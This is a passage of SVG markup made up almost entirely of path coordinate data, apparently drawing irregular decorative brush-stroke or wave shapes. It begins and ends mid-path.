c-.1-.2-.7-.3-1.3-.4-1.2-.4-.4.1-2.2.1a.68.68,0,0,1,.5-.4c1.5-.1,2.7-.2,1.3-.3a.87.87,0,0,1-.5-.1,53,53,0,0,1,5.4-1.3c-6.7-.2-4.6.5-9.1.5-.2-.1-.5-.2-.7-.3,1.9-.1,1.8-.3,1.1-.7,4.8.1,5.9-.1,8.2-.1-9.7-.7-4.3-1.6-1.9-2.1a21.47,21.47,0,0,1,3,.3c1.3-.6.9-.9-2.2-1.2.2,0,.3-.1.5-.1,1,.1,2.4.1,3.8.1-1.3.1-2.6.5.9.6-.5-.3,4.1,0,2.9-.4-.3-.1-1.2-.1-2.1-.2a9.89,9.89,0,0,1,2.3.2c.1.6,3.1,1-.2,1.3-2.3-.1-1.1-.3-3.1-.4l.4.4c1.7.1,2.7.1,3.5.1-.4.2-2,.3-4.9.1.3.3,4.8.9,5.5.4-5.2-.3,1.6-.1,2-.2-1.8,0-1.1-.2-1.2-.3a20.13,20.13,0,0,1,2.2.1c-1.5-.4-1.8-.8-1.6-1.1a23.62,23.62,0,0,1,4.2.4c-.2.1-.3.3-.4.4a15,15,0,0,0-2.5.2h2.7c.1,0,.2.1.3.1-.2,0-.2-.1-.3-.1,2.5,0,2.8.2.5.2,5,.1.8.5,4.5.5,2-.5-3.3-.7-.7-1.1,4.8.7,2.1,1.4,10.7,1.9.3.4.2.6-.2.8h-.2a10.52,10.52,0,0,0-2.9,1.5c3.6.1,5.4,0,5.3-.3-3.3-.1-1.8-.4-1.1-.7.8.2.7.6,1.4.7,4.3.2,3-.3,7.3-.1-.6-.2-2.7-.6.4-.6.1.1.3.1.7.2,1.2.5-.8.9,1.6,1.4,1.4-.2,4.1.5,5.7.7a12.27,12.27,0,0,1,2.1,0c.3-.2,2.1-.3,2.8-.5,1.7.5,2.4-.1,5.2,0,1.8.1.1.5,3.5.5.9-.2,3.1-.8-.6-.9-.1.6-7.2-.1-9.7-.4,5.2-.2-.3-1.2,7.6-1.3-1.5-.1-3.3-.2-4.5-.4,1.5-.5,2.8-.8,8.2-.4-.4-.3,1.4-.3,2.9-.4,1.2.2,1.7.9-1.5.8.3.3,2.2.4.4.6,2,.2,4.4.4,6.7.6-1.8.5,2,.6.7,1,1.9,0,3.8.1,5.7.1.4.2-1.8.2-2.6.3,2.1.3,4.1-.1,5.8.2.6.5-.5.3-2.7,0-.7.4,7,.4,6.2.8-9-.3,1.2.6-5.1.5a11.33,11.33,0,0,1,2.6.3v.1c-.1,0-.2.1-.4.1h-1.7c1.8.5-2.8.2-1.8.5a26.2,26.2,0,0,0,2.8.1c1.9.1,2.1,0,2-.1.5,0,1-.1,1.3-.1a6.42,6.42,0,0,1-1.8-.2.3.3,0,0,0,.2-.1c.4,0,.9.1,1.5.1h.1c.7.1,2.3.1,2.7.2,3.5,0,7.9,0,9.5-.2-9.3-.2,1.1-.3-3.4-.7a13.45,13.45,0,0,0,4.2,0c-3.2,0-1.9-.4-4.5-.4-.4.2-.1.5-3.9.3-1.3-.5-1.1-.9,0-1.2a50.79,50.79,0,0,1,7.8.2c-.5-.3.1-.5,2.9-.4.1-.2-1.4-.3-1.4-.5h4.2c.9.4,5.3.5,10,.9a7.88,7.88,0,0,1,2-.1c-3.2-.5,3.2-.4-1.6-.8a73.05,73.05,0,0,1,8.5.2c-1.3.1-1.1.4,1.4.5-.6-.4-1-.8-5-1.2a8.17,8.17,0,0,0,1.3-.2c1.6.1,3.4.1,4.9.2-.2.3,3,.2,2.5.6-.6,0-1.1.1.1.1,0-.1.1-.1,1-.1.3.1.2.2,1.2.2-1-.4,1.6-.3.6-.6-2,0-3.4-.1-4.6-.2,2.2,0,3.8,0,3.4-.2h-4.2c1.5-.2,1.2-.4-.6-.7,4.3.2,2.4-.6,6.2-.2.8-.4-4.8-.2-4.5-.5a7.35,7.35,0,0,0,2.4-.5h.5a8.34,8.34,0,0,1,1.8-.2c1.6,0,3.5,0,3.5-.2a21.47,21.47,0,0,1-3-.3c.4.2.3.3-.4.3a13.35,13.35,0,0,1-2,0h0c.1-.2,0-.5-.4-.7.8,0,1.7.1,2.5.1,5.8.2,10.1.4,8,1-7.2.1-3.4.6-1.7,1.3-1.9,0-3.1-.1-4.3-.2-.3.2-3.5,1.1,2.5,1.3,3.1.1-2.1-.3-.5-.6,4.6.2,1.6-.3,5.4-.2,2.3,1-.5,1.1-7.4,1,.5.7-1,1.1-2.1,1.8-.5.3-.9.6-1,1.1h.9c2.7.1,4.2-.2,4.8.1-2.2.3,1.1.5.9,1a12.82,12.82,0,0,0-4.1,0c5.1.5-4.5.4,3.4.7a34.87,34.87,0,0,1-5,.3h-1.7c.5,0,1.1.1,1.7.1,1.9.1,4.1.2,5.5.3.7.3.2.4-.9.5,2,.2,5.3.2,7.3.4-1.5-.5,2.6-.4,5.2-.4.6-.3-1.6-.4-2-.5.1,0,.2-.1.3-.1,1.8,0,3.6.1,5.4.1,1,.4-3,.4,1.9.6,5.1-.3-10.1-1-4.2-1.6-.6.6,3.8.2,6,.5-1.3-.7,12.9-1.8,13.5-.5,4.8.2,5-.1,5.3-.3-3.6,0-5.1-.2-4.6-.4-2.5-.1-8.2-.1-8.6-.3.9-.3,2.1-.6-2.2-.9,6-1.7.7-3.9,1.8-5.9,1.4.5,1.4.5.8.9,8.2.2,3.8.7,4.9.8,1.1-.3,1.7.4,4.3.1,1.6.9-.8,1.5,6.1,2.2-.5-.9,9.1.5,8.3,0-8.8-.6-7.4-1.3-3-1.8-1.7-.1-4-.1-4.4-.2,4.9-.2,5.3.5,7.7.8a45.25,45.25,0,0,0,4.6-1.1c2.2.1,4.6.3,4.6.5-1.1.4-2.8.2-.7.7-1.9,0-3.1-.1-4.3-.2-.1.3,3.5.4,3.4.7-2.4-.1-4.7-.1-7.1-.2a60.26,60.26,0,0,1,11.1,1.6c2-.7,13.6-1.2,8.1-1.9,2.4,0,8.4-.1,9.8.1-3,.4-4.4.3-.5,1-1.8,0-2.1-.2-4.4-.2.7.9-9.7.2-8.8,1.1,2.5.2,6.1.4,7.6.7.7-.3,6.6.1,7.2.3-2.7.1-3.5.3,1.6.3-3.1.4-.1,1.3-5.7,1.4-3.3-.1-4.3-.3-8.6-.3-4.3-.7-2.4-1.6-3.5-2.4-2.6,0-4.7,0-5.5.1,3.1,0,4.6.2,4.5.4-3.2,0-3.7,0-7.1-.2.5.3.8.5-2.3.5l-.4-.4c-7.1-.2-9.4.6-7.5.9a31.43,31.43,0,0,1,4-.2c.5.2,2.5.2,3.1.4-.8.4-4.8,0-6.8.2,4,.3-3.2,0-2.6.2,2.1.1,4.6.3,4.6.5-2.1,0-5.3-.2-5.6,0,11.8,1.3-6.6,1.6,4.1,3a30.21,30.21,0,0,0-5.2.4c5.3.1,7.7-.1,12.5,0-.7-.5-2.3-1.5,4.1-1.7.5.2,3.7.8-.6.9,2.1.1,5.2.1,5.8.2-2.2,1.1,5.1,2.9.6,3.8.2-.2,6.2.1,6.9-.1-5.9-.5-4.6-1.1.2-1.3-5.2-.8-3.5-2-5.2-2.7,7.9.1,8.8-.8,14.8-.5.6-.3-2.6-.9.5-1,.6.3,4.8.4,6.2.7,1-.2,2.9-.4,2-.8,3.6.1,4.6.3,5.6,0-1.1-.9-3.9-2,4.6-2.7,8.2.3,4,1,6.8,1.5,2.4-.4.1.5,3.2.5,0-.3,8.6-.1,9.9.2-1,.2-3.1.3-8.2.1.4.3.8.6,4.7.7-3.1-.7,7.4.1,6.8-.2-2.1-.1-3.6-.3-4.5-.4,8.3.2.3-.6-2.1-.8,4-.2-6.2-1.7,2.4-2,2,.4,3.5.7,2.2.9,5.9.2,9,.6,10.7,1.1-2.7.2-2.8-.1-5.8-.2.9.3,9.2.9,2.3,1a17.36,17.36,0,0,0-4.6-.5c4.6.7,13.6,1.5,14.3,2.1a52.3,52.3,0,0,0,5.6,0c3.1,1.1,11.6,2.3,3.7,2.6,1.2.4-.9,1,2.5,1.3.9-.4,7.8-.2,6.5-.5,2.2.4,5.5.8,9.3,1.1-4.1,0-.6.8-3.4.9-3.8,0,.5-.5-3.2-.5-8.7.9.3,3.1-7.5,4.1-4.3-.3,3.2-.9-3.8-1.2-3,.3-.9.9-4.3,1.4-5.2,0-6.4-.3-6.2-.7,8.4.2,2.8-1.4,13.3-.7-3.7-.6-4.9-1.3.1-1.5-.8-.2-5.6-.2-4.7-.5a33.79,33.79,0,0,1,4.5.3c-6.7-.7-2.8-2.7-10.1-3.6,2.6,0,4.7,0,5.5-.1-3.4-.1-4.1-.5-7.5-.6,1.9.4-2.7.3-3.8.5,2.1.1,5.3.7,2,.7s-1.9-.4-4.6-.4c-.3.1.2.2-1.2.2a4,4,0,0,0-1.6-.3c0,.5,9.4,1.3,2.7,1.5,1.1-.4-5-.3-6.1-.6,2.9-.4-2.6-1.4-4.2-1.6,2.1.7-7.4.4-9.1.8-2.4-.5,3.7-.1,2.4-.5a97.88,97.88,0,0,0-13.7.2c.7-.3-3.1-.3-4.5-.4-2,.2.6.9-6.6.4-.2.3,2.3.9-2.1.8-3.1-.3-.3-.9-6.5-1,18.3,2.3-19.2,2.2-5.9,4.3-6.7-.3-6.1.1-8.1.3-5.3-.3-9.4-.7-13.5-1.1,2.5-.2-.1-.3-.5-.6,2.2-.3,5.6.2,5.4-.2a52.3,52.3,0,0,0-5.6,0c-1.2-.5.7-.6,1.6-1.4-5-.3-5.1-.6-10.2-.6,2.6.8-2.7,1,4.4,1.8-3.1-.3-14.6,0-6.6.4.1-.2-.9-.4,1-.4,2.1.1,5.2.1,5.8.2-1,.4,5,.9-2.1.7,1.7-.1,1.5-.4-1.8-.5.2.4-2.6-.1-4,.2,4,.4,5.1,1.3,1.3,1.4-1.4,0-2.8-.1-4.3-.1,2.5-.4-10-1-3.3-.6-3.1.7,9.5,1.4,13.9,1.6.9.3-5.2,0-5.4.2,6.5.2,7,.7,10.7,1.1-.8-.2,4.9-.3,5.6,0-2.3.6,1.7,2-3.4,2.4-2.6-.2-4.7-.5-5.7-.1,9.8.3-1.9.9,2.5,1.3,4.9.2,1.4-.4,6.8-.2-.9.5,6.7.5,7.8.9-4.8.3-2.5,1.8.6,2.3,4.7-.1-2.1-.7,3.6-.7,3,.3,8.9.3,11.6.6-1.6.2,1.3.8,3.7,1.1a11.3,11.3,0,0,1,5.6,0c2-.9-3.5-1.5-2.2-2.4a55.5,55.5,0,0,1-5.9-.4c2.4,0-.6-.5,2.4-.5,5,.1,2.3.7,7.7.8.8-.3-5.6-1.4,1.8-1.2-.2-.2-.3-.4-.5-.6-9.9-.2-5.9-1.5,2-.9.9-.5-2.2-1.4,5.9-1.2-2.6.6-1.5,1.2,3,1.8.4-.2,3.9-.1,2.3-.5a19.43,19.43,0,0,1-4.5-.4c3.3,0,.9-.5,3.8-.5a66.19,66.19,0,0,0,6.9-.1c4.6.6-.7,1.1-1.5,1.5,5.6.2.7-.6,5.1-.5,2.3.1,1.1.3,3.1.4,3.1,0-1.4-.8,2-.8,2,.3,1.6.8,6.4.9a56.21,56.21,0,0,1-6.2.8c5-.1,6.4.7,14.8,1-5.7-.7-13-1.6-3-1.8-2.2-.6-3.4-1.5,1.3-1.7a68.57,68.57,0,0,0,7.7.8c5.8-.1-4.8-1-1.1-1.2.3.1.6.3,3,.3.1-.3-3-.4-4.7-.7a50.7,50.7,0,0,1,9.7,0c-4.4,1.2,1.3,2.6-6.4,3.8-3.3-.9,6.9-1.6-3.4-2.3,4.2.6-3.8.6,2.3,1-2,.4-8.3.3-4.8.9-1.6-.4,3.6,0,4.2.1a5.61,5.61,0,0,0-2.1.7c7.5.2,4.3,1.1,12.3,1.4-9-1.3.3-2.2,5.8-2.9-2.4-.4-5.6.1-7.2-.3a31.43,31.43,0,0,1,4-.2c7.3.5,5.3.1,12.4,0,2.9.7-6.4.2-6.4.6,1,.3,7.4.9,5.1,1a26.88,26.88,0,0,1-3.1-.3,17.67,17.67,0,0,0-2.4.4c3.2,0,5.4.1,5.9.4-7-.1-11.7,0-12,.6a41.15,41.15,0,0,1,4.3.1c-2.9.3-2.3.9-5.9,1.2,4.8.3.3.5,3.6,1-6.5-.2,1.2,1-4.8.9,1.1,0,1.7.1,1.6.3,14,.5,3.4-1.4,11.2-1.5-.4.6,3.3.5,4.4.2,7.8,1-10,1.5-1.2,1.8-.2.3-7.2.8-3.5.8,1.9-.5,1.1-.1,7,0,2.9,0-3.7-.8.6-.9,2,.1,1.6.8,3.2.5-1.4-.5-.2-.5-3.5-.8,1.5-.1,5.2-.1,6.8-.2-1.2-.2-6.9-.1-6-.5,15.1.2,5.5-1.5,12.2-1.9,5.5,1.7,2,3,3.6,4.1a9.07,9.07,0,0,1,2.8.1l.3.3c-3.3-.1-5.4-.1-7,0,3.6.5-2.9.4-3.5.8,4,.9,2.2,3-1,3.6-.2.5,3.4,2.5-5.9,2.8,2.1.1,5.2.1,5.8.2a31.08,31.08,0,0,0-5.1,2.1c1.9.1,5.4,0,5.8.2-1.2.2-5.1.1-6.7.3,9.3.8-4.7,1.1,1.8,2,6.9,0,1.8-.4-.4-.4a3.93,3.93,0,0,1,2.3-.5c.2.5,2.2,0,4.3.1,1.8.2,1.9.3.4.4,11.2.3.2-1.1,0-1.6s10.4,0,9.1-.7a35.62,35.62,0,0,0-4,.1c-2.2-.5-5.6-1.2.1-1.4,1.2.4,6,.2,5.5-.1-3.5-.3-1.7-.4-5-.9,6.9.5.7-.6,8.3,0-.5-.6-4.2-.3-6.2-.7,5.6-.2-1.1,0-1.8-.5,2.8,0,2.5-.3,5.6,0,.6-.6-4-1.1-1.3-1.4-2-.2-4.4-.3-6-.5,1.5-.4,2.9-.8,1.5-1.5,10.8.3,8.9-1.4,16.6-1.7-1.7-.1-4-.1-4.4-.2.2-.3,8.2,0,3.8-.5-4.9-.2-1.4.4-6.8.2-1.9-.6-6.4-1.7-3.4-2.3-1.4.3,5.5.7,6.1.6-2.4-.3-6-.6-6.5-1,1.9.2,5.3.2,7.3.4,1.4-.6-2.8-1.3-1.5-1.7,1.6.1,2.3.2,3,.3,2,.8-3.9,1.9,3.6,2.5-2.8-.8,3.8-1.7-1.1-2.8,7.9.2-4.54-1.69,4.66-1.79-7-1.1-4-2.51.24-3.41V0Z\"></path>\n <path d=\"M1739.6,46.7c-1.3-.4.4-.6,2.1-.7-4.5-.2-8.8-.4-11.7-.7A94.06,94.06,0,0,1,1739.6,46.7Z\"></path>\n <path d=\"M1838.7,75.8c3.8-.5,1.4-.8,4.5-1.2-4.6,0-5.9,1-7.6,1.1C1836.6,75.8,1837.7,75.8,1838.7,75.8Z\"></path>\n <path d=\"M1862.2,72.5c-2.3.1-8.6.3-5,.7C1856,72.7,1864.7,73.1,1862.2,72.5Z\"></path>\n <path d=\"M1718.3,65.2c1.8.6.3.8,1.4,1.6,3,.2,7.5.6,7,0-1.6-.1-5.3-.3-6.2-.7,3.6-.3,3-1.2,1.2-1.8-2.2.2.3.1.4.4H1718c-3-.5-4.1-1.1-8.5-1.7-.1-.6,7.4-.1,7.6-.8-8.7-.3-7.1-.8-6.9-1.5,1.4,0,2.9.1,4.3.1-4-.5,1.6-.6-5.4-1.3h4.2c4,.3,7,2.2.1,1.7,5.1.9,9.1,1.5,4.8,2.3,2.5,0,5,.4,5.7.1-2.5-.5-3.2-1.1.1-1.4-7.8-.4-5-1.3.1-1.4,0,.3.2.5,3.3.6,4.2-.5,5.8-.7-1.3-1.4-1,.3,5,.9.9,1-2.1-.1-3.6-.3-4.5-.4,3.2-.2,1.8-.3.7-.7,6.2.2,3.5-.3,6.6-.4-3.1-.3-5.9.1-7.3-.4,1.3-.4-3.9-.9,1.8-1.2,2.3.2,2.9.5,6.2.7.4-.4-5.3-.4-4.9-.8,3.8.1,3.5-.2,3.9-.3-5.2-.7-1.8-1.5-8.8-2.2,2.6-.1,1.5-.5,3.6-.6-.2.2.7.4,3.2.5-5.6-.8,1.1-1.6-8.4-1.7-1-.5,7.9-.5,3.3-1-.3.1.1.2-1.2.2.1-.2-1.8-.3-1.8-.5,6.1,0-2.4-1.2,4.4-1.3-5.8,0-3-.5-6.2-.7-2.9.6-4.4,1.4-6.6,2-3.2-.8-2.7-1.2-3.2-2,2.4,0,6.1.8,5.8.2-9.1-.6.1-1.1-5.7-1.8-1.1.4.3,1.1-5,1.1h-2.4c1.2,0,2,.1,2.4.1.7.1.5.1,0,.1-1,.1-3.4.2-3.4.3,1.6.1,2.7.1,3.4.2,3,.3-.8.9,2.3,1.4h-2.3c-1.8,0-1.2.2,0,.4l1.6.3a7.82,7.82,0,0,1-1.6-.1c-4.9-.1-3,.4-6.4.4a35.32,35.32,0,0,1,6.4.7c1.3.3,1,.5,0,.8-1.7.4-5.2.7-6.7.9,1,0,4.1.3,5.5.4-.2.3-10,.1-5.1.5,1.4-.1.1-.4,3.9-.2.5.4,1.4.8-2,.8a32.58,32.58,0,0,1,4.3.4c.2,0,.4.1.4.2s-.2.1-.4.1a23.8,23.8,0,0,1-4.3.3c1.2.1-1.7.7,1.3.5,1.1-.1,2.1-.2,3-.2,4.4,0,4.4,1.6-.1,2.1a29.32,29.32,0,0,1-5.3.1c.8.2,3.7.4,5.3.5a3.78,3.78,0,0,1,1,.2,3.07,3.07,0,0,0-1,.1,44.23,44.23,0,0,1-6.9.5c.5.6,5,1.1-.2,1.3a54.5,54.5,0,0,0,7,0h0c1.7.3,4.7.7.6.8-.2,0-.4-.1-.7-.1a22.83,22.83,0,0,0-6.6-.3c3.7.3.7,1.2-.3,1.2,1.5.3,4.4.1,6.9.2h.2c.9.3,4.1.5,6.3.8-1.3.1-2,.3-3.9.4-1-.1-1.8-.2-2.6-.3-1.1-.2-2.1-.3-3.7-.5,3.1.5-2.2.5.9,1,1.1.1,2,.1,2.8.1a10.84,10.84,0,0,1,2.9.1c-.6.5-3.9.5-2,.9,1.9,0,3.8.1,5.7.1.5-.5,0-.7.4-1.1,2.1,0,5.3.2,5.6,0C1711,66,1709.7,65.1,1718.3,65.2Z\"></path>\n <path d=\"M1860.5,67.3c4.2,0,1.8-.7,4.8-.9,8.1.5,10.1,1.7,1.6,1.8-1.4-.3,1.7-.2.9-.5-4.9,0-5.7,1.1,1.2,1.3-.8-.8,6.3-.8,10.1-1.2-1.7-.1-4-.1-4.4-.2,7.2.2.4-.4,5.2-.4-2,.2,5.1.4,4.3.2-3.4-.1-3.5-.4-6-.6,1.2.3-2.7.1-4,.2.2-.2-2.1-.3-3.1-.4,5.3-.1,7.5,0,9.4-.3-4.6-.2-4.2.1-7.1-.2,1.9.5-4.6.2-5.2.4l-.3-.3c-1.9,0-3.8-.1-5.7-.1C1864.6,66.8,1858.1,67.1,1860.5,67.3Z\"></path>\n <path d=\"M1873,68.9c2.9-.1,4.8-.3,6.5-.5C1873.4,68.2,1871.4,68.8,1873,68.9Z\"></path>\n <path d=\"M1728.4,62.5c-7,.2,5,1.2,0,1.5-4.8-.2,3.4-.3-3.1-.4,1,.2-1.1.6,2,.7C1737.4,64.2,1726.8,63,1728.4,62.5Z\"></path>\n <path d=\"M1744.4,63.3c-1.8,0-7.3,1.1-1.9,1C1739.6,64.1,1745.3,63.7,1744.4,63.3Z\"></path>\n <path d=\"M1778.9,63c.4.5-8.9,2.1,1.6,1.8C1782.1,64.2,1783.4,63.8,1778.9,63Z\"></path>\n <path d=\"M1774.7,62.9c-.4-.4-5.4-.5-7.7-.8C1762.9,61.6,1769.6,62.9,1774.7,62.9Z\"></path>\n <path d=\"M1855.3,63.1c8,.1.4-1.1-2.6-1.4-.6.2-6.7.7-3.7.6,2.4,0,2-.4,5.3-.3C1852.1,62.4,1857.9,62.7,1855.3,63.1Z\"></path>\n <path d=\"M1816.5,60c4.4.2,2.5-.2,6.9-.1l-.3-.3C1819.3,59.6,1819.2,59.9,1816.5,60Z\"></path>\n <path d=\"M1840.9,48.4C1849.2,48,1837,46.9,1840.9,48.4Z\"></path>\n <path d=\"M1814.7,45.4c-.9.6,2.7,1.4,6.9,1.6C1817.5,46.5,1819.8,45.7,1814.7,45.4Z\"></path>\n <path d=\"M1737.3,44.2c4.1,0,4.3,0,8.5.2,1.6-.5-8.2-.3-7.6-.7.8,0,1.5-.1-.1-.1C1733.3,43.7,1739.7,43.9,1737.3,44.2Z\"></path>\n <path d=\"M1750.7,43.6c-4.4-.2-5.1,0-8.4-.1.4-.2,2.7-.5-2-.7-1.8.1-.4.5-2.2.6,6,0,3.4.5,8.8.5C1744.4,43.5,1753.1,44.1,1750.7,43.6Z\"></path>\n <path d=\"M1780.6,44.5c3.5-.1,2.2-.8.6-.9a15.43,15.43,0,0,1-2.8-.1C1782.1,44,1777,44.2,1780.6,44.5Z\"></path>\n <path d=\"M1707,96.5c-4.4-.2-2.5.2-6.9.1-1.5-.4,1.7-.4.7-.7-.6-.1-6-.6-7.2-.3,4.8.3.4.7.9,1a32.42,32.42,0,0,1,4.4.3C1699,96.5,1709.4,97.3,1707,96.5Z\"></path>\n <path d=\"M686.9,114.8c-2.8.2.1.2.4.4C688.4,116.2,691.2,115,686.9,114.8Z\"></path>\n <path d=\"M528.3,98.8c-3.3-.1-5.4-.1-7,0,.3.1,0,.3,1.7.4C522,98.7,530,99.2,528.3,98.8Z\"></path>\n <path d=\"M731.3,102.1c.1.2,1.4.3,3.2.4-1.4-.4,5.6,0,3.8-.5C733.7,101.9,735.7,102.3,731.3,102.1Z\"></path>\n <path d=\"M637.4,96.4c1.8,0,2.1.2,4.4.2-.6-.2,1.7-.2,2.5-.3A37,37,0,0,0,637.4,96.4Z\"></path>\n <path d=\"M575.1,93.5c3.6-.1,3.2-.7-2.2-.9C574.5,92.9,571.4,93.2,575.1,93.5Z\"></path>\n <path d=\"M530.4,91.7a26.2,26.2,0,0,1-2.8-.1c-.9,0-1.6,0-1.3.1,4.7.1-3.8.4,3.2.5C528.1,91.9,531.2,92,530.4,91.7Z\"></path>\n <path d=\"M518.1,90.3c0,.1.5.8,1.8.5-2.4-.5,8.7-.2,2.1-.7C522.5,90.4,521.2,90.4,518.1,90.3Z\"></path>\n <path d=\"M529.3,87.2c.1.1.3.1,1.5.1l-.4-.4c-2.7,0-6.1-.1-5.4.2A41.09,41.09,0,0,1,529.3,87.2Z\"></path>\n <path d=\"M661.7,87.7c1,.3,1.7.6,6.2.7C667.9,88,665.7,87.8,661.7,87.7Z\"></path>\n <path d=\"M593.9,80.2c-5.8-.1,1.1-.3-4.5-.4.4.4,1.3.7,3.6,1C592.2,80.4,595.4,80.5,593.9,80.2Z\"></path>\n <path d=\"M525,77.6c-1.6.1-5.2.1-7,0C517.4,78.2,529.5,77.9,525,77.6Z\"></path>\n <path d=\"M745.9,79.3c-.5.2-2.8.6,2.1.8C747,79.9,749.2,79.4,745.9,79.3Z\"></path>\n <path d=\"M661,77.4c-1.2-.3-1.2-.7-3.6-1C655.2,76.6,656.4,77.3,661,77.4Z\"></path>\n <path d=\"M660.4,73.6c2.5-.3,3.6.5,5.7.1-4.9-.6-.6-1.7-4.4-1.8-2.1,1.4-12.4,3.2-5.6,4.7C662.2,75.9,668.4,75,660.4,73.6Z\"></path>\n <path d=\"M636.6,73.4c-6.1-.2-4.3.5.5.6C636.9,73.7,636.7,73.6,636.6,73.4Z\"></path>\n <path d=\"M601.8,71.7c1.4,0,2.8.1,4.3.1l-.4-.4C601.9,71.2,602.2,71.5,601.8,71.7Z\"></path>\n <path d=\"M749.9,68.1c-5.8-.1-3.6.5-.7.7C749,68.5,748.1,68.2,749.9,68.1Z\"></path>\n <path d=\"M593.6,64c-.9-.2,1.2-.5-1.9-.6.5.2-.8.3-4,.2.9.2-1.2.5,1.9.6C588.6,63.9,590.9,63.7,593.6,64Z\"></path>\n <path d=\"M610.1,62.3c-1.6-.4-1.6-.4-.6-.7a23.82,23.82,0,0,1-2.8-.1c-.9,0-1.7,0-1.3.1,4.1.2.6.5-.9.5C608.3,62.2,607.5,62.4,610.1,62.3Z\"></path>\n <path d=\"M749.3,64.2c-.2-.4-.8-.8-3.7-1.1C747,63.7,745.2,64,749.3,64.2Z\"></path>\n <path d=\"M597.7,57.7c-.4.2-2.8.2-2.4.5C598.9,58.2,602.8,57.8,597.7,57.7Z\"></path>\n <path d=\"M601.8,57.5c-5.3-.5,2.2-.4-3.4-.7-1.4.2-1.3.5-2.1.7C598.9,57.6,599.2,57.5,601.8,57.5Z\"></path>\n <path d=\"M748.1,59.7c-2.1.3,1.2.5.9,1C751.3,60.7,750.6,59.9,748.1,59.7Z\"></path>\n <path d=\"M599.7,56.7c1.8-.1,1.9-.6-2-.7C598.6,56.2,596.5,56.6,599.7,56.7Z\"></path>\n <path d=\"M727.2,56.4c-3.8-.1-4.5,0-3.9.3,2,0,3.2.1,4.4.2C727.3,56.7,724.7,56.6,727.2,56.4Z\"></path>\n <path d=\"M737.8,55.9c1.9,0,3.2.1,4.4.2,0-.3-.9-.6-3.4-.7C739.4,55.6,738.9,55.8,737.8,55.9Z\"></path>\n <path d=\"M869.9,52.8c1.3.4-2.2.3-.8.6,3.3.1,5.4.1,7,0C876.1,53.1,873.9,52.9,869.9,52.8Z\"></path>\n <path d=\"M626,40.8c-3.5-.1-4.8.4-2.3.5C625.1,41.2,627.5,41.2,626,40.8Z\"></path>\n <path d=\"M647.7,38.7c-3.6.1-2.1.7,2.2.9C647.5,39.2,649.9,38.9,647.7,38.7Z\"></path>\n <path d=\"M639,35.1a4,4,0,0,0-1.6-.3c.2.2.3.4.5.6,3.7.2,6-.2,2.4-.4C640.3,35.1,640.2,35.2,639,35.1Z\"></path>\n <path d=\"M755.1,31.3c-2.7,0-3.2-.2-5.8-.2,5.2.7-5.5,1,1.3,1.4C753,32.2,750.2,31.4,755.1,31.3Z\"></path>\n <path d=\"M688.7,25.2a10.17,10.17,0,0,1-2.7,0c-.3-.1,0-.3-1.7-.4,1.2.5.4,1,4.9.9C683.7,25.5,694.9,25.5,688.7,25.2Z\"></path>\n <path d=\"M706.2,19.9a26.2,26.2,0,0,1-2.8-.1c-.4-.2.1-.4-1.8-.5-.4.2-2.8.2-2.3.5C702.5,20,705.5,20.3,706.2,19.9Z\"></path>\n <path d=\"M739.6,13.7c1-.1,1.7-.2,1.7-.4,1.1.4,3.7.8,5,1.2-.5-.4-3-.9-5.5-1.5a.08.08,0,0,1,.1.08v0a34.18,34.18,0,0,0-3.5-.3C738.5,13.1,736.3,13.5,739.6,13.7Z\"></path>\n <path d=\"M527.9,101.5c4.5.1,11.5.6,13,.5-5.8-.3-12.8-1.1-6.8-1.4-4.7-.2-.8.3-5.5.1.3-.1,1.8-.2,1-.4a31,31,0,0,0,4.2.1c-1.9-.4,2-.2,2.4-.4-8.4-.3-4,.6-13.7.2-5.8.7-1,1.9-1.3,3-.1.3-.7.6-2.2.9,2.2.3,2.9.1,4.4.3-4.5.1.1.4-2.1.7a41.51,41.51,0,0,1,6,.5c-2.8-.1-1.5.3-5.5.1-2.5-.1-.4-.5-3.3-.6.8.3-3.8.5-.8.6a98.06,98.06,0,0,1,10,.3c3.9-.6-.1-1.3-4.5-2,.1.1-1,.1-1.4,0,2.7.1,1.9-.2,3-.2h1c2.8.2,2.4.6,4.8.8a21.29,21.29,0,0,1,4.3.1c-5.7-1.4.5-1.9-8.1-2.9-.1.1.5.3-1.1.3C525.6,101.8,526,101.6,527.9,101.5Z\"></path>\n <path d=\"M732.3,103.2c-.7.3,4.1.3,3.3.6-6.8-.1-2.6.5-6.4.6,6.2-.1-.9.3.6.7,8.9-.4,4.4-1.6,7.7-2.3C729.7,102.6,738.3,103.3,732.3,103.2Z\"></path>\n <path d=\"M526,99.3c-2.3.1-8.6.3-5,.7C519.7,99.4,528.4,99.9,526,99.3Z\"></path>\n <path d=\"M524.2,94.1c4.2,0,1.8-.7,4.8-.9,8.1.5,10.1,1.7,1.6,1.8-1.4-.3,1.7-.2.9-.5-4.9,0-5.7,1.1,1.2,1.3-.8-.8,6.3-.8,10.1-1.2-1.7-.1-4-.1-4.4-.2,7.2.2.4-.4,5.2-.4-2,.2,5.1.4,4.3.2-3.4-.1-3.5-.4-6-.6,1.2.3-2.7.1-4,.2.2-.2-2.1-.3-3.1-.4,5.3-.1,7.5,0,9.4-.3-4.6-.2-4.2.1-7.1-.2,1.9.5-4.6.2-5.2.4l-.3-.3c-1.9,0-3.8-.1-5.7-.1C528.3,93.5,521.8,93.8,524.2,94.1Z\"></path>\n <path d=\"M536.7,95.7c2.9-.1,4.8-.3,6.5-.5C537.2,94.9,535.1,95.6,536.7,95.7Z\"></path>\n <path d=\"M734.1,99c3.5.1,2.9-.1,7,0C740.5,98.1,739.3,98.7,734.1,99Z\"></path>\n <path d=\"M519,89.8c8,.1.4-1.1-2.6-1.4-.6.2-6.7.7-3.7.6,2.4,0,2-.4,5.3-.3C515.9,89.2,521.6,89.4,519,89.8Z\"></path>\n <path d=\"M652.2,86.4c-1.3-.9-6.3-2.1-1-2.8-5.1,0-2.2.2-5.8-.2,2.4.7-11.4,1.2-3.7,2.1-1.7,0-4-.1-4.2,0,6.1.1,1,.4-1,.4,2.8.6-.4,1.4-1,2.1,3.4-.1,7.1.4,7.1.2-2-.1-1.8-.3-3.1-.4,8.8.2,6.5-.2,12.5,0-6.6-.3,1.6-1.2-5.2-1.2C646.8,86.3,651.5,86.5,652.2,86.4Z\"></path>\n <path d=\"M609.4,72.5c4.1.1,11.6,1,3.2.5.3.4,6.8.4,8.9.6-.5-.4-3.6-.6-4.9-.9C615.6,73.2,611.9,72.1,609.4,72.5Z\"></path>\n <path d=\"M603.1,63.8a15.43,15.43,0,0,1-2.8-.1,64,64,0,0,0,7.8.9C606.2,64.4,607.1,63.9,603.1,63.8Z\"></path>\n <path 